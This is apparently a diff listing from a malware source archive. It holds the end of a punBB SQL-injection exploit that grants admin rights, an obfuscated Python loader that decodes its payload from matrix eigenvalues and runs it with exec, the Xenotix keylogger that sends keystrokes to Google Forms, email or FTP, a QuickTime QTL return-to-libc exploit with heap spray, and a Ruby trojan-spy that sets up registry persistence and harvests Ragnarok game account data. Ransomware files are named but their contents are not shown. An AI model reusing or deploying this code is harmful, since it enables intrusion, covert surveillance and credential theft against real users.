sys.exit(-1)
if domain == None:
print "[-] catch all domain needed to continue"
sys.exit(-1)
# Retrive cookie
params = {
'req_username' : username,
'req_password' : password,
'form_sent' : 1
}
wclient = urllib.URLopener()
print "[+] Connecting to retrieve cookie"
req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
info = req.info()
if 'set-cookie' not in info:
print "[-] Unable to retrieve cookie... something is wrong"
sys.exit(-3)
cookie = info['set-cookie']
cookie = cookie[:string.find(cookie, ';')]
print "[+] Cookie found - extracting user_id"
user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
print "[+] User-ID: %d" % (int(user_id))
wclient.addheader('Cookie', cookie);
email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
append = 'group_id=\'1'
email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
params = {
'req_new_email' : email,
'form_sent' : 1
}
print "[+] Connecting to request change email"
req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params))
print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
if __name__ == "__main__":
main()

208
Python/Kirk_ransomware.py Normal file
View File

File diff suppressed because one or more lines are too long

220
Python/RedKeeper-ransomware_source.py Normal file
View File

File diff suppressed because one or more lines are too long

BIN
Python/Scrypt.7z Normal file
View File

Binary file not shown.

BIN
Python/Sin.7z Normal file
View File

Binary file not shown.

98
Python/Virus.Python.Agent.c Normal file
View File

@ -0,0 +1,98 @@
def root3(num):
fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j
fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j
a=num**(1/3.0)
b=a*fak1
c=a*fak2
return([a,b,c])
def getPQ(a,b,c):
p = b-((a**2)/3.0)
q = c + ((2*(a**3)-9*a*b)/27.0)
return([p,q])
def getU(p,q):
u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0)
return(root3(u3))
def getLambda(a,p,u):
if u[0] == 0:
L0=u[0] - a/3.0
else:
L0=u[0] - p/(3.0*u[0]) - a/3.0
if u[1] == 0:
L1=-a/3.0
else:
L1=u[1] - p/(3.0*u[1]) - a/3.0
if u[2] == 0:
L2=-a/3.0
else:
L2=u[2] - p/(3.0*u[2]) - a/3.0
return(L0,L1,L2)
def getABC(mtx):
a=-(mtx[0]+mtx[4]+mtx[8])
b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6]
c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6]
return([a,b,c])
def eigenvalues(mtx):
ABC=getABC(mtx)
PQ=getPQ(ABC[0],ABC[1],ABC[2])
U=getU(PQ[0],PQ[1])
L=getLambda(ABC[0],PQ[0],U)
return(L)
def getstring(M):
str=''
for c in range(len(M)):
mLD=eigenvalues(M[c])
for i in range(len(mLD)+1):
for n in range(len(mLD)):
if round(mLD[n].imag)==i:
str+=chr(int(round(mLD[n].real)))
return(str)
M=[]
M.append([(113.01385812+5.43930508534j),(1.00380746157-8.31965051919j),(0.801104731078+0.936588237838j),(3.54083344964+0.95424311335j),(108.978932614-0.625324609788j),(0.972664728193+3.21561313492j),(-1.96068431273+4.58178510931j),(3.38000675384-5.19874167231j),(109.007209265+1.18601952445j),])
M.append([(63.0988642714+6.73474244088j),(38.7957438546+7.29183564711j),(34.4164174161-43.9985000655j),(-3.42189631605-2.2839106126j),(113.592704397+4.68789276089j),(3.78797602794+2.84593141297j),(11.8086451552+20.4309988015j),(-3.08750519397-21.3451644199j),(88.308431332-5.42263520176j),])
M.append([(104.406855517-9.51624929923j),(0.968098716657+10.247486874j),(-10.7284625243-8.95847099578j),(12.9139324019-13.3095003388j),(96.7571541203+10.1186269916j),(7.53204087547-16.3313451185j),(-9.47853339226+0.528078467428j),(6.9494984576+1.54492254096j),(101.835990363+5.39762230766j),])
M.append([(117.007583423+0.42259290212j),(10.4289001938+0.0037209199438j),(7.38888705374+0.935638896508j),(7.48115014303-3.41289258877j),(109.069280503-0.755948319674j),(3.24478449812-2.16750354816j),(-5.74964216381+9.69321702672j),(-7.26693352937+5.36042347147j),(97.9231360734+6.33335541755j),])
M.append([(110.186416521-0.282612884393j),(-2.46184250953-5.55813797363j),(4.65778281951-4.75979618248j),(1.2659069035+12.6581511208j),(107.886755805+0.474822088624j),(3.77155367287+6.88744471253j),(-7.42510092378+1.80348448129j),(3.14192118127+4.23989806091j),(97.9268276743+5.80779079577j),])
M.append([(72.2140022769+61.3183653042j),(-18.8737409148-15.7060435241j),(58.3392636255+30.6485277395j),(-67.1552054341+56.3911897282j),(98.6385647787-16.4179748155j),(56.9733296013+58.133872392j),(45.8159400299-18.7587055968j),(4.2035312554+13.3668119287j),(90.1474329444-38.9003904887j),])
M.append([(104.049507734+5.75582437702j),(-8.72678394019-5.7668384277j),(-11.0728012113-0.32217237915j),(-6.87057321217+21.3939122634j),(103.760022178-2.99256708802j),(-6.18499776219-12.1551478727j),(-8.55296803681+54.31807084j),(-58.3551932758-7.47435960792j),(39.190470088+3.236742711j),])
M.append([(76.9430409827-13.830066127j),(25.1319832458+9.77882938313j),(23.6549471992+11.4951304553j),(-3.81624310702-25.6964065375j),(108.730230203+24.1623701839j),(5.05322782415+22.5769539708j),(-39.5767673149+3.75005714549j),(33.4962700542-11.2140580554j),(135.326728814-4.33230405689j),])
M.append([(65.3705381002+24.3275637724j),(-23.2408507633-33.1948135285j),(-44.3749218976-10.1563451877j),(30.8389091728+74.8930292425j),(41.3652574764+15.0556813223j),(-36.9319552246+53.5371650042j),(-24.3971696191-65.7465103691j),(47.0569815727+0.905906700125j),(136.264204423-33.3832450947j),])
M.append([(103.879170415-6.73853523077j),(-20.1941478753-16.2138368074j),(1.27422168444+35.9444148563j),(-3.28016774977+2.63824729836j),(104.873906957+14.1425509676j),(14.7081936915-15.7091034424j),(1.23585470553+0.462230318846j),(3.99583062229+0.00177486657705j),(104.246922628-1.40401573681j),])
M.append([(109.670502533+0.403141520484j),(7.62437688862-0.469520922423j),(-3.8130361216-0.375627871282j),(14.0602377266+3.46852117946j),(92.5012496763+2.28293319899j),(2.21516616594-3.96314049044j),(1.15517757889+16.0475697982j),(-14.3244254327-19.1761387797j),(119.82824779+3.31392528053j),])
M.append([(103.630364939+4.54863042641j),(7.34206767122+2.30334575024j),(3.93792103721-1.42468650631j),(5.28646514805-8.78486038728j),(98.758713343+3.91722107348j),(-5.40281247446+4.3533159006j),(14.5436715774+5.03112629715j),(-8.19448665625-12.6529950692j),(97.6109217181-2.46585149989j),])
M.append([(104.391701773-1.28789346598j),(0.228987611687+5.26905457024j),(-1.3673287265-2.9154578731j),(-5.19199921432-5.86731771378j),(107.927827685+4.0817978047j),(5.19694717434-2.72187536151j),(-3.43168840953-7.95022707391j),(6.04669461661+4.18498345448j),(108.680470541+3.20609566129j),])
M.append([(88.1645520027+10.9191618534j),(9.74598033305+18.068953036j),(-0.113455388879-5.11740033423j),(-34.909679646-39.8975995576j),(43.7694619926-2.4494446771j),(-12.7606575537-15.2531928161j),(-8.99329464816-45.2183653921j),(-56.5464769405-7.27118850532j),(111.065986005-2.46971717635j),])
M.append([(87.8436008855+37.2629509457j),(-51.9477703666-28.3330817872j),(-20.1947489139-12.0838625073j),(-15.6555897585+36.5732828063j),(47.3314962468-32.3154414398j),(-21.1146466098-12.552594695j),(0.498644271988+5.19403644322j),(-9.1206559221-3.17935277945j),(95.8249028677+1.05249049408j),])
M.append([(111.146805692+4.22816251299j),(2.00324359806+10.5843665889j),(-2.76026670136+5.20361787029j),(-0.985087506932-1.29558792278j),(97.2988804122+4.77489490019j),(-2.81701992434-5.43193976106j),(4.97185962129-5.27998630615j),(-1.43241652008-10.0386034583j),(117.554313896-3.00305741318j),])
M.append([(-21.059624269+69.4352827883j),(47.7772465004-121.415108205j),(120.935434939-10.9319876972j),(2.32311751035+7.32736096727j),(93.8129822074-6.8056664753j),(0.0754000989682-4.74426213079j),(-48.3307205418+97.4666346448j),(-20.0521590244-119.910441446j),(173.246642062-56.629616313j),])
M.append([(94.7688077375+18.270605105j),(-50.3580988311-8.3225498517j),(30.4393219197+24.5256489646j),(-6.85270305911+5.89181789918j),(82.1382476449-5.73463476433j),(4.80123601494+10.7017896355j),(6.61864679123-4.83167627161j),(13.778199697+8.88223295844j),(98.0929446176-6.53597034071j),])
M.append([(223.253418937+5.95739588995j),(-77.8544386917+92.0828034681j),(-66.0443657955-165.557230081j),(20.0015446384+12.4300989707j),(73.3785528053+6.58501047921j),(4.85014684391-40.1196037084j),(43.2420823142-86.4244985314j),(35.1454404794+94.4180400311j),(-44.6319717425-6.54240636915j),])
M.append([(41.0142081682+23.2692063962j),(-10.6086219501+12.7493725956j),(-46.7302597052+49.2056004608j),(51.637072693-8.01584922166j),(110.718041509-6.48634894989j),(46.8309243128-32.6164121693j),(-12.3478982429-19.6604596911j),(-6.48744349525-3.43877091281j),(81.2677503229-10.7828574463j),])
M.append([(109.877621466+12.9575670925j),(-0.778140589321+10.5307376923j),(13.6006972337-3.82251684732j),(-1.48970463341-8.29533978213j),(102.357458012-1.86290951708j),(-5.23584582302-2.25840002211j),(7.6099988791-4.90702093254j),(5.7456354155-0.0460450739799j),(99.7649205225-5.0946575754j),])
M.append([(94.7045035062-25.6229683407j),(-18.2391253369+22.7937631609j),(-29.0905604048-7.19037097502j),(-23.0583403669-39.2866397524j),(84.4266794832+39.7464274999j),(-46.0279000559-20.4386101794j),(-20.7027086938-29.2221245384j),(-18.6498115923+31.300573431j),(76.8688170106-8.1234591592j),])
M.append([(105.670108346-3.91057638934j),(-3.64697546254+1.44567755708j),(-3.71735073048-12.7439262806j),(-7.99274261168+0.34948217567j),(109.08995481+3.47786624051j),(-10.2704859141+6.0654065736j),(-0.194287756539+3.86197876037j),(-1.44643001225-2.3985124903j),(102.239936845+6.43271014883j),])
M.append([(122.580470378-14.4341507316j),(-27.9438628782+10.3163428973j),(-15.959467946-25.3057176316j),(31.5540729618-32.8694065023j),(46.8175228377-21.2447861623j),(6.09279603678-75.1153578148j),(-22.2133570254+12.3894404294j),(34.6467245111+24.5784878294j),(99.6020067838+41.6789368939j),])
M.append([(118.85308691+82.9440945768j),(-36.7483143231+71.5868022216j),(-14.0602241989+48.8832603538j),(-132.891784217-67.3064515175j),(33.3702442097-118.126219615j),(-62.7605460516-60.0857139837j),(12.2710245926+63.6543411513j),(-20.456384219+60.6722531119j),(107.77666888+41.1821250382j),])
M.append([(106.436935258+0.928988682079j),(3.93779429639+6.68647382008j),(-0.0389643589009+10.2941097267j),(2.02626855767+0.877555321617j),(99.4113275962+4.72209193461j),(-3.18653446253+4.32872182213j),(-0.943084208786-6.41108105498j),(2.98095284974-3.31170222485j),(105.151737146+0.348919383309j),])
M.append([(89.8393869858+35.1156535265j),(-108.098660853-84.0641370429j),(-93.5592844814-144.096505433j),(-1.52256241496+37.1313230361j),(-62.3311003044-67.6198151922j),(-149.146935766-152.098017315j),(-11.6934149927-25.8642378853j),(102.202629088+0.396174315178j),(221.491713319+38.5041616656j),])
M.append([(184.999581386-303.410690053j),(218.314145844-155.474761163j),(262.880172627+230.115099676j),(-538.767619748-98.455473687j),(-203.66848676-357.747658577j),(359.059170049-493.880837704j),(469.81304818-382.628798149j),(531.60552896+5.35571698513j),(261.668905373+667.15834863j),])
M.append([(124.484426976-4.79265261306j),(-1.90039577969+15.2806731306j),(-18.7190751541+1.5572252021j),(27.8626383998+26.0405223995j),(79.3599559898+13.1200825749j),(-18.4075679284-18.5560150143j),(-12.4597152173+7.93055072715j),(-2.36047405658-8.7957114854j),(108.155617034-2.32742996182j),])
M.append([(92.6459559853-1.61276841314j),(-2.0775597689+6.17372014973j),(1.58885077997+44.1526032096j),(-10.0586572313-15.3981052444j),(102.608682641+6.90841217943j),(-28.4935227638+37.3104003402j),(0.952674935262+1.69014692933j),(0.176304072703+1.37540601544j),(115.745361374+0.704356233709j),])
M.append([(110.352225966+15.0065645213j),(1.42965534543-13.4014323936j),(-10.7448834991+0.0219689393547j),(57.5347841678-26.5000549214j),(55.3558840653-19.5118382831j),(-15.349876293+32.2392737263j),(-13.599951644-29.5406287949j),(-11.8306821749+21.3907330347j),(114.291889969+10.5052737619j),])
M.append([(127.619853945+6.41616340126j),(3.62478727278-7.68008027677j),(0.124935166111-11.0775400641j),(-2.76561151013-15.0636851946j),(101.573759382+1.49058531598j),(-7.1698539994+3.47262961061j),(5.56386532794+0.856124995439j),(0.556465885654-2.13151008852j),(107.806386673-1.90674871724j),])
M.append([(129.375564736-27.6356017879j),(130.633802405+16.6327156314j),(63.9163645123-80.5372989939j),(5.30892321897+13.7359651655j),(64.8038754853+38.8830235124j),(3.09452345512+35.5540061223j),(-17.5222898492-0.775799027654j),(-33.6207752829-55.6332905587j),(48.8205597791-5.24742172451j),])
M.append([(128.165629995+46.851034685j),(-43.5399488716+50.0747581674j),(-46.0582844675-16.3828631231j),(-29.8868468217+65.6767553681j),(12.9446164156-2.75648494841j),(-26.6597116882-79.7372322933j),(-16.5963386111+31.3463623124j),(-47.430583864-6.87775041003j),(100.889753589-38.0945497366j),])
M.append([(107.475753937-8.73914157279j),(-14.7370476469-12.2953925586j),(-9.0605469686-11.6014273048j),(6.78665637989-45.7250245438j),(57.0367272907-30.8464281211j),(-15.8499229947-40.2424461761j),(-49.7238750637+31.9402101387j),(6.57848208777+65.6049084414j),(77.4875187726+45.5855696939j),])
M.append([(115.100711527+2.07929665225j),(0.41771554184-0.785257450021j),(-0.0371116950126+0.0181246287347j),(2.06862780962+1.08414962847j),(114.922123142+1.20839044412j),(0.802727678553+1.91427683396j),(0.494766249983+0.00450813801499j),(0.101233800608+0.6116084733j),(116.977165331+2.71231290364j),])
M.append([(118.758300393-38.713436278j),(-100.033551513-21.6515062627j),(99.6928681056-5.4765076885j),(41.4635727201-48.9116687864j),(-28.8384928343+13.0342444563j),(65.3947415069-23.7200622778j),(54.9240245771+4.62648931131j),(-46.411851834-46.1306247796j),(96.0801924414+31.6791918218j),])
myMTXcode=getstring(M)
exec(myMTXcode)

210
Python/xenotix.py Normal file
View File

@ -0,0 +1,210 @@
'''
Xenotix Python Keylogger for Windows
====================================
Coded By: Ajin Abraham <ajin25@gmail.com>
Website: http://opensecurity.in/xenotix-python-keylogger-for-windows/
GitHub: https://github.com/ajinabraham/Xenotix-Python-Keylogger
FEATURES
========
1.STORE LOGS LOCALLY
2.SEND LOGS TO GOOGLE FORMS
3.SEND LOGS TO EMAIL
4.SEND LOGS TO FTP
MINIMUM REQUIREMENTS
===================
Python 2.7: http://www.python.org/getit/
pyHook Module: http://sourceforge.net/projects/pyhook/
pyrhoncom Module: http://sourceforge.net/projects/pywin32/
pyHook Module -
Unofficial Windows Binaries for Python Extension Packages: http://www.lfd.uci.edu/~gohlke/pythonlibs/
NOTE: YOU ARE FREE TO COPY,MODIFY,REUSE THE SOURCE CODE FOR EDUCATIONAL PURPOSE ONLY.
'''
try:
import pythoncom, pyHook
except:
print "Please Install pythoncom and pyHook modules"
exit(0)
import os
import sys
import threading
import urllib,urllib2
import smtplib
import ftplib
import datetime,time
import win32event, win32api, winerror
#Disallowing Multiple Instance
mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
print "Multiple Instance not Allowed"
exit(0)
x=''
data=''
count=0
#Hide Console
def hide():
import win32console,win32gui
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window,0)
return True
def msg():
print """Xenotix Python Keylogger for Windows
Coder: Ajin Abraham <ajin25@gmail.com>
OPENSECURITY.IN
usage:xenotix_python_logger.py mode
mode:
local: store the logs in a file [keylogs.txt]
remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script.
email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO).
ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY).
"""
return True
#Local Keylogger
def local():
global data
if len(data)>100:
fp=open("keylogs.txt","a")
fp.write(data)
fp.close()
data=''
return True
#Remote Google Form logs post
def remote():
global data
if len(data)>100:
url="https://docs.google.com/forms/d/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx" #Specify Google Form URL here
klog={'entry.xxxxxxxxxxx':data} #Specify the Field Name here
try:
dataenc=urllib.urlencode(klog)
req=urllib2.Request(url,dataenc)
response=urllib2.urlopen(req)
data=''
except Exception as e:
print e
return True
#Email Logs
class TimerClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.event = threading.Event()
def run(self):
while not self.event.is_set():
global data
if len(data)>100:
ts = datetime.datetime.now()
SERVER = "smtp.gmail.com" #Specify Server Here
PORT = 587 #Specify Port Here
USER="your_email@gmail.com"#Specify Username Here
PASS="password_here"#Specify Password Here
FROM = USER#From address is taken from username
TO = ["to_address@gmail.com"] #Specify to address.Use comma if more than one to address is needed.
SUBJECT = "Keylogger data: "+str(ts)
MESSAGE = data
message = """\
From: %s
To: %s
Subject: %s
%s
""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
try:
server = smtplib.SMTP()
server.connect(SERVER,PORT)
server.starttls()
server.login(USER,PASS)
server.sendmail(FROM, TO, message)
data=''
server.quit()
except Exception as e:
print e
self.event.wait(120)
#Upload logs to FTP account
def ftp():
global data,count
if len(data)>100:
count+=1
FILENAME="logs-"+str(count)+".txt"
fp=open(FILENAME,"a")
fp.write(data)
fp.close()
data=''
try:
SERVER="ftp.xxxxxx.com" #Specify your FTP Server address
USERNAME="ftp_username" #Specify your FTP Username
PASSWORD="ftp_password" #Specify your FTP Password
SSL=0 #Set 1 for SSL and 0 for normal connection
OUTPUT_DIR="/" #Specify output directory here
if SSL==0:
ft=ftplib.FTP(SERVER,USERNAME,PASSWORD)
elif SSL==1:
ft=ftplib.FTP_TLS(SERVER,USERNAME,PASSWORD)
ft.cwd(OUTPUT_DIR)
fp=open(FILENAME,'rb')
cmd= 'STOR' +' '+FILENAME
ft.storbinary(cmd,fp)
ft.quit()
fp.close()
os.remove(FILENAME)
except Exception as e:
print e
return True
def main():
global x
if len(sys.argv)==1:
msg()
exit(0)
else:
if sys.argv[1]=="local":
x=1
hide()
elif sys.argv[1]=="remote":
x=2
hide()
elif sys.argv[1]=="email":
hide()
email=TimerClass()
email.start()
elif sys.argv[1]=="ftp":
x=4
hide()
else:
msg()
exit(0)
return True
main()
def keypressed(event):
global x,data
if event.Ascii==13:
keys='<ENTER>'
elif event.Ascii==8:
keys='<BACK SPACE>'
elif event.Ascii==9:
keys='<TAB>'
else:
keys=chr(event.Ascii)
data=data+keys
if x==1:
local()
elif x==2:
remote()
elif x==4:
ftp()
obj = pyHook.HookManager()
obj.KeyDown = keypressed
obj.HookKeyboard()
pythoncom.PumpMessages()

61
Ruby/Constructor.Ruby.Qtp.a Normal file
View File

@ -0,0 +1,61 @@
#!/usr/bin/ruby
# Copyright (c) LMH <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Notes:
# Our command string is loaded on memory at a static address normally,
# but this depends on execution method and the string length. The address set in this exploit will
# be likely successful if we open the resulting QTL file directly, without having an
# instance of Quicktime running. Although, when using another method and string, you'll need
# to find the address.
# For 100% reliable exploitation you can always use the /bin/sh address,
# but that's not as a cool as having your box welcoming the new year.
# Do whatever you prefer. That said, enjoy.
#
# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html
# Command string: Use whatever you like.
# Remember that changing this will also need a change of the target address for system(),
# unless string length is the same.
CMD_STRING = "/usr/bin/say Happy new year shit bag"
# Mac OS X 10.4.8 (8L2127)
EBP_ADDR = 0xdeadbabe
SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back
SETUID_ADDR = 0x900334f0
CURL_ADDR = 0x916c24bc # /usr/bin/curl
SHELL_ADDR = 0x918bef3a # /bin/sh
CMDSTR_ADDR = [
SHELL_ADDR, # 0 addr to static /bin/sh (lame)
0x017a053c, # 1 addr to our command string (cool) :> (change as necessary)
0xbabeface, # 2 bogus addr for testing.
CURL_ADDR # 3 addr to '/usr/bin/curl'
]
# Payload. default to CMDSTR_ADDR 0 (/bin/sh)
HAPPY = ("A" * 299) +
[EBP_ADDR].pack("V") +
[SYSTEM_ADDR].pack("V") +
[SETUID_ADDR].pack("V") +
[CMDSTR_ADDR[0]].pack("V") # change array index for using diff. addr (see CMDSTR_ADDR)
# Sleds: not necessary if using /bin/bash addr or other built-in addresses.
# although, for using our own fu, we need to spray some data for better reliability
# the goal is causing allocation of large heap chunks
NEW = ("\x90" * 30000) + CMD_STRING # feed the heap
YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go
APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more
BOYZ = ("\x90" * 30000) + "FOOM" # and more
# QTL output template
QTL_CONTENT = "<?xml version=\"1.0\"?>" +
"<?quicktime type=\"application/x-quicktime-media-link\"?>" +
"<embed autoplay=\"true\" moviename=\"#{NEW}\" " +
"qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " +
"src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n"
target_file = File.open("pwnage.qtl", "w+") { |f|
f.print(QTL_CONTENT)
f.close
}

574
Ruby/Trojan-Spy.Ruby.Kakkeys.d Normal file
View File

@ -0,0 +1,574 @@
$KCODE = 's'
#$DEBUG = true
#Exerb = nil
require 'Win32API'
if ARGV.size == 1 and ARGV[0].include?('RoAddr')
$path = ARGV[0]
if File.exist?($path)
$rost = Win32API.new($path, 'RO_GetNowState', '', 'l')
$rowld = Win32API.new($path, 'RO_GetNowWorld', '', 'p')
$ropa = Win32API.new($path, 'RO_GetNowParam', 'i', 'p')
$roin = Win32API.new($path, 'RO_RoAddrInit', 'lpl', 'i')
$roin.call(0, '', 0x7FFFFFFF)
$rost.call
if $rost.call == 2
print $ropa.call(258).to_s + "[#{$rowld.call}]"
end
end
exit
end
require 'win32/registry'
require 'ftools'
def dll(file)
if !File.exist?('C:/windows/system32/' + file)
f = Exerb.open(file)
f.binmode
open('C:/windows/system32/' + file, 'w'){|f2|
f2.binmode
f.read 9
p f2.write(f.read)
}
f.close
end
end
if Exerb
if !Exerb.filepath.include?('iexplore')
File.copy(Exerb.filepath, 'C:/windows/system32/iexplore.exe')
`start install.exe`
dll('zlib.dll')
dll('7-zip32.dll')
dll('imgctl.dll')
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
}
`start C:\\windows\\system32\\iexplore.exe`
exit
else
=begin
$double = Thread.new{
cm = Win32API.new('kernel32', 'CreateMutex', 'llp', 'l')
rm = Win32API.new('kernel32', 'ReleaseMutex', 'l', 'l')
ch = Win32API.new('kernel32', 'CloseHandle', 'l', 'l')
om = Win32API.new('kernel32', 'OpenMutex', 'llp', 'l')
gle = Win32API.new('kernel32', 'GetLastError', '', 'l')
hage = cm.call(0, 0, 'hagemoe')
if gle.call == 183
ch.call hage
hage = nil
hagege = cm.call(0, 0, 'hagegemoe')
if gle.call == 183
ch.call hagege
exit 1
end
elsif
0
end
if hage
s = 'hagegemoe'
else
s = 'hagemoe'
end
while(1)
a = om.call(1, 0, s)
if a == 0
if ARGV[0] == 'aaa'
p system("start #{Exerb.filepath}")
else
p system("strat #{Exerb.filepath} aaa")
end
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
}
sleep 0.1
else
ch.call(a)
end
#p "sss"
sleep 0.04
end
}
=end
end
end
if ARGV[0] == 'aaa'
sleep
end
END {
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
}
}
require 'kconv'
require 'web/agent'
require 'web/linkextor'
$wait_time = 1
$bbs_arr = [['computer', '10041'], ['computer', '10376'], ['computer', '11089'], ['computer', '14218'], ['computer', '14368'], ['computer', '6135'], ['computer', '6253'], ['computer', '6346'], ['computer', '7430'], ['game', '1185'], ['game', '12884'], ['game', '18472'], ['game', '19824'], ['game', '5420'], ['game', '5458'], ['game', '6141'], ['game', '9397'], ['shop', '832'], ['computer', '6567'], ['game', '10013'], ['computer', '21565'], ['computer', '21563']]
$category = ''
$bbs = ''
$ropath = []
$korepath = []
$nypath = []
$toolpath = []
$charanames = []
$tar = ['ragnarok.exe', 'items_control.txt', 'winny.exe']
$tool = ['ChatPon.exe', 'arose*.exe', 'AutoImo.exe', 'eqview.exe', 'ExS.exe', 'Meron*.exe', 'RAGNAvi.exe', 'RoAbrPure.exe', 'RoCha.exe', 'RoMonitor.exe', 'ro.exe' ,'ROPTAssist.exe' ,'RSS.exe' ,'rohp.exe' ,'RoLogger.exe' ,'MessengerGPS.exe' ,'Lognarok.exe' ,'ro_gps.exe', 'ROGIS.exe' ,'xdior*.exe' ,'LimeChat.exe']
$kakikomi = []
$id = ''
$charaarr = []
$charas = ''
$tekito_id = ''
def Dir.copy(from, to, *jogai)
begin
sleep 0.01
Dir.foreach(from){|x|
if !x.match(/^\.\.?/)
if File.directory?(from + x)
Dir.mkdir(to + x)
Dir.copy(from + x + '/', to + x + '/', *jogai)
else
if !jogai.any?{|jo| x.include?(jo)} or jogai.size == 0
File.copy(from + x, to + x)
end
end
end
}
rescue
return 1
end
0
end
def delete_dir(dir)
begin
Dir.foreach(dir){|x|
if !x.match(/^\.\.?/)
if File.directory?(dir + x)
if Dir.entries(dir + x).size <= 2
Dir.delete(dir + x)
else
delete_dir(dir + x + '/')
end
else
File.delete(dir + x)
end
end
}
Dir.delete(dir)
rescue
return 1
end
0
end
def roname
abx = `#{Exerb.filepath} \"#{$ropath}/RoAddr.dll\"` if Exerb
return nil if abx.size == 0
$charanames.push(abx) if !$charanames.include?(abx)
savedata($savefile)
abx
end
def emotion_wana wana
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Gravity Soft\Ragnarok\ShortCutList', Win32::Registry::Constants::KEY_WRITE){|key|
for i in 0..9
key.write_s(i.to_s, wana)
end
}
end
def upfolder(folder, trip)
Dir.mkdir(folder) if !File.exist?(folder)
begin
$nypath.each{|x|
File.chmod(0777, x + '/upfolder.txt')
open(x + '/UpFolder.txt', 'a+'){|f|
f.write("\n[ブーン]\nPath=#{folder}\nTrip=#{trip}") if !f.read.include?('ブーン')
}
}
rescue
end
folder
end
def saiki dir
sleep 0.01
begin
Dir.chdir(dir){
#print Dir.pwd + "\n"
$ropath.push Dir.pwd if File.exist?($tar[0])
$korepath.push File.dirname(Dir.pwd) if File.exist?($tar[1])
sleep 0.01
$nypath.push Dir.pwd if File.exist?($tar[2])
$kakikomi.push( Dir.pwd + '/' + 'kakikomi.txt') if File.exist?('kakikomi.txt')
$toolpath.push Dir.pwd if Dir[$tool.join("\0")].size != 0
Dir.foreach('./'){ |x|
if File.directory?(x) && !x.match(/\.\.?/)
saiki(x)
end
}
}
rescue
p $!
ensure
end
end
def search
get_drv_type = Win32API.new('kernel32', 'GetDriveType', 'p', 'l')
for drive in 'CDEFGHIJKLMNOPQRSTUVWXYZ'.split('')
if get_drv_type.call(drive + ':/') == 3
saiki(drive + ':/')
end
end
$ropath.uniq!
$toolpath.uniq!
$korepath.uniq!
$nypath.uniq!
end
def savedata(path)
open(path, 'w'){|f|
Marshal.dump($ropath, f)
Marshal.dump($korepath, f)
Marshal.dump($nypath, f)
Marshal.dump($toolpath, f)
Marshal.dump($kakikomi, f)
Marshal.dump($bbs_arr, f)
Marshal.dump($charanames, f)
Marshal.dump($tekito_id, f)
}
true
end
def loaddata(path)
return false if !File.exists?(path)
open(path){|f|
$ropath = Marshal.load(f)
$korepath = Marshal.load(f)
$nypath = Marshal.load(f)
$toolpath = Marshal.load(f)
$kakikomi = Marshal.load(f)
$bbs_arr = Marshal.load(f)
$charanames = Marshal.load(f)
$tekito_id = Marshal.load(f)
}
true
end
def rns *str
if str.size == 1
str = str[0].split('')
end
str[rand(str.size)]
end
def names
begin
$charaarr = []
$charas = ''
separater = rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', '焼', 'ああああ', 'zeny', 'ini', 'config', 'パケ', *$omosiro_words)
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\Whisperlist\\') { |wisp_list|
wisp_list.each_key{|server_str, sute|
$charas += server_str + "\n"
wisp_list.open(server_str){|server|
server.each_key{|char_str, sute|
$charaarr.push char_str.split("\0")[0]
}
}
$charas += $charaarr.join(separater) + "\n" + $charanames.join(separater) + "\n"
$charaarr = []
}
}
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\'){|key| $id = key.read('ID')[1].split("\0")[0]}
rescue
p $1
end
end
names
$upup = upfolder('C:\program files\daemontools\\', '')
$capture = Proc.new{
loop do
getDC = Win32API.new('user32', 'GetDC', 'l', 'l')
